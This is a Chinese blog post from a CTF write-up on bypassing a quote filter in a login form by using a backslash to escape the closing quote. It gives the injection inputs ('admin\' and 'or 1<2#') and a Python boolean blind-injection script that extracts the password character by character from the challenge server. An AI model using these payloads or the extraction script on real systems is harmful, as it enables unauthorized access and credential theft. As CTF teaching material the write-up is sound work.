SQL注入——使用转义符“\“

最新推荐文章于 2024-07-25 15:27:34 发布
最新推荐文章于 2024-07-25 15:27:34 发布
阅读量3.3k 收藏 6
点赞数 1
分类专栏: CTF 文章标签: sql python Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzu_lfl/article/details/129717185
版权

题目地址

打开题目是一个登录界面,尝试弱密码和万能密码但都不行(有很多过滤)。所以用爆破的方式看看都过滤了哪些字符。

使用burp抓包对用户名(或密码)进行爆破,发现用来闭合语句的单引号/双引号都被过滤了。那这里就没法用常规套路注入。此时就需要找其他方式,扫目录发现存在/robots.txt文件,里面显示还有一个/hint.txt文件。

hint.txt里面有一句sql语句,假设我们输入用户名:admin,密码:666,那么这个sql查询语句就会变成

select * from users where username='admin' and password='666';

此时由于单引号被过滤,但转义符”\“没有被过滤,”\“可以让原本的特殊字符失去功能变成纯文本,在编程语言中要想打印单引号就要在单引号前加上转义符”\“使其失去特殊含义。在这个sql语句中也可以通过”\“来让其中的单引号失去作用,从而创造出可注入的点。

select * from users where username='admin\' and password='666';
这里在admin后面加上一个'\'这样让admin后面的单引号失效,而admin前面的单引号就会自动找到666
前面的单引号配对,此时username的值就变成了"admin' and password="然后再在666后加上#把最后
的单引号注释掉,这样'666'就成为可以执行恶意语句的地方,构造恶意语句:
select * from users where username='admin\' and password='or 1 < 2#';

所以在登录界面输入用户名:admin\   密码:or 1<2#

此时页面回显变化说明注入成功了,但是由于"select"被过滤了,页面也只有两种回显,那么就只能进行盲注了。在hint.txt里面得知我们的目标是得到正确的password就能拿到flag,从sql语句中看出此时的操作就是在users表里面进行的,而我们要的列名就是password。所以可以编写python脚本进行盲注。

import requests

session = requests.Session()

def getPassword():
    password = ''
    for i in range(100):
        begin = 32
        end = 128
        mid = (begin + end) // 2
        while begin < end:
            payload = "or ascii(substr((password),%d,1)) > %d #" % (i, mid)
            paramPost = {"username":"admin\\","password":payload}
            response = session.post("http://123.60.47.130:23333/index.php",
                                    data = paramPost)
            if 'stronger' in response.text:
                begin = mid + 1
                mid = (begin + end) // 2
            else:
                end = mid
                mid = (begin + end) // 2
        password += chr(mid)
        print(password)

getPassword()

运行该脚本就可以得到password:OhyOuFOuNdit,而用户名就是admin。登录即可得到flag

Fox_light
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入知识点
m0_55772907的博客
04-27 3626
1 Sqllab渗透测试天书 Microsoft英文文档 ORDER BY Clause (Transact-SQL) - SQL Server | Microsoft DocsSELECT - ORDER BY Clause (Transact-SQL)https://docs.microsoft.com/en-us/sql/t-sql/queries/select-order-by-clause-transact-sql?view=sql-server-ver152 Iwebsec靶场 判断字
【安全】mybatis中#{}和${}导致sql注入问题及解决办法
m0_59598029的博客
03-22 1595
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
使用PHP转义函数:避免XSS漏洞
lcradio的专栏
02-28 1295
近期出现很多CMS出现XSS漏洞等新闻,PHP作为比较安全的网络编程语言,也变得“不那么安全”,其实,注意使用PHP中常用的转义函数、安全函数就可以过滤大部份常见的攻击手段,如SQL注入、XSS攻击等。 1. htmlentities htmlentities把HTML中可以转义的内容转义成HTML Entity。html_entity_decode为htmlentities的
SQL转义字符和通配符
高性价比服务器就选:蓝易云
05-04 769
总结起来,在数据库查询语言SQL中,“转义”和“通道”就像是我们手上强大而灵活地工具——转义让我们能够安全地处理具有特殊含义和功能地数据;在编程语言中,有些字符具有特殊含义或功能,在某些情况下可能会导致错误或不期望的结果。在探索数据库的世界时,我们经常会遇到一些特殊的字符和符号,它们在SQL语句中起着至关重要的作用。它们是数据库查询语言中不可或缺的一部分,帮助我们更精确、更灵活地操作数据。在SQL中,通配符是用于替代任何其他字符或字符集的特殊字符。它们在LIKE操作符中使用,用于搜索数据库表格中的数据。
SQL注入——预编译CASE注入
来日可期的博客
09-25 1633
预编译 CASE(Prepared CASE)是一种数据库查询语言(如SQL)中的控制语句,它可以根据条件表达式的值来选择执行不同的语句块,类似于编程语言中的 switch 语句。预编译 CASE 注入则是一种基于预编译 CASE 语句的安全漏洞攻击。预编译 CASE 注入攻击的漏洞原理与其他类型的注入攻击相似,即攻击者尝试构造特定的输入数据来绕过应用程序的输入验证和过滤机制,从而能够执行未经授权的操作或获得敏感信息等。在预编译 CASE 注入攻击中,攻击者通常会针对应用程序中存在的具有条件判断语句
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入——pikachu靶场
cjh12340826的博客
07-20 638
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
java处理sql注入方法——sql转义
xzw_123的专栏
01-13 8758
昨天被扫描出来sql注入问题,之前以为已经解决了,没想到还是出现了。 网上现有方法: 1、preparestatement 由于每次执行都需要prepare,所以不推荐使用 2、一个单引号变成两个replace("'","''")其他的字符串替代方法有着局限性,就不列举了。 我最开始使用的是2方法,但是还是有方法可以破解。 后来参考php的addslashes函数,写了一个java的e
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 961
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
SQL注入——宽字节注入
一只web狗
06-21 496
宽字节注入简介
sql注入转义的php函数代码
01-20
sql注入:  正常情况下:  delete.php?id=3; $sql = ‘delete from news where id = ‘.$_GET[‘id’];  恶意情况:  delete.php?id=3 or 1; $sql = ‘delete from news where id = 3 or 1’; ——-如此执行后,...
SQL注入简单总结——过滤逗号注入.pdf
04-08
"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的SQL注入情况。在SQL语句中,逗号常用于分隔不同的元素,例如在`UNION`、`LIMIT`等子句中。 1. **过滤逗号的绕过方法**: ...
防止xss和sql注入:JS特殊字符过滤正则
12-01
对于SQL注入,预防的最佳做法是始终使用参数化查询或预编译语句,避免直接将用户输入拼接到SQL命令中。这能确保即使输入中有恶意SQL代码,也只会被视为普通文本,不会被执行。 总的来说,安全编程是Web开发中的重要...
PHP+MysqlSQL注入源码 下载
01-01
这个"PHP+MysqlSQL注入源码 下载"的主题涉及到一个常见的安全问题——SQL注入,以及如何处理和预防这种情况。下面将详细讨论SQL注入、PHP与MySQL的结合使用,以及如何防范SQL注入。 **SQL注入** SQL注入是一种...
PHP——SQL注入测试靶场
05-27
【PHP——SQL注入测试靶场】是一个用于学习和实践SQL注入漏洞的安全平台,它通过PHP编程语言构建,目的是帮助开发者和网络安全爱好者理解SQL注入的工作原理,以及如何防范这种常见的Web安全威胁。SQL注入是一种攻击...
Sqli-labs-master的21—25通关教程
weixin_68416970的博客
07-25 846
Sqli-labs-master靶场的21、22、23、24、25关教程
leetcode 1555 银行账号概要(postgresql)
最新发布
weixin_51696882的博客
07-25 1100
力扣银行 (LCB) 帮助程序员们完成虚拟支付。我们的银行在表 Transaction 中记录每条交易信息,我们要查询每个用户的当前余额,并检查他们是否已透支(当前额度小于 0)。 写一条 SQL 语句,查询: user_id 用户 ID user_name 用户名 credit 完成交易后的余额 credit_limit_breached 检查是否透支 ("Yes" 或 "No") 以任意顺序返回结果表
会Excel就会sql
svygh123的专栏
07-20 1425
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
sql注入转义字符绕过
11-02
SQL注入是一种常见的攻击方式,攻击者通过在SQL语句中注入恶意代码来获取敏感信息或者控制数据库。而转义字符是一种防止SQL注入的常用手段,但是攻击者可以通过绕过转义字符来达到攻击的目的。以下是一些常见的绕过转义字符的方法: 1.使用双写绕过,例如将单引号'转义为'' 2.使用16进制编码绕过,例如将单引号'转义为\x27 3.使用注释符绕过,例如将单引号'转义为'/* 4.使用特殊字符绕过,例如将单引号'转义为%27
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值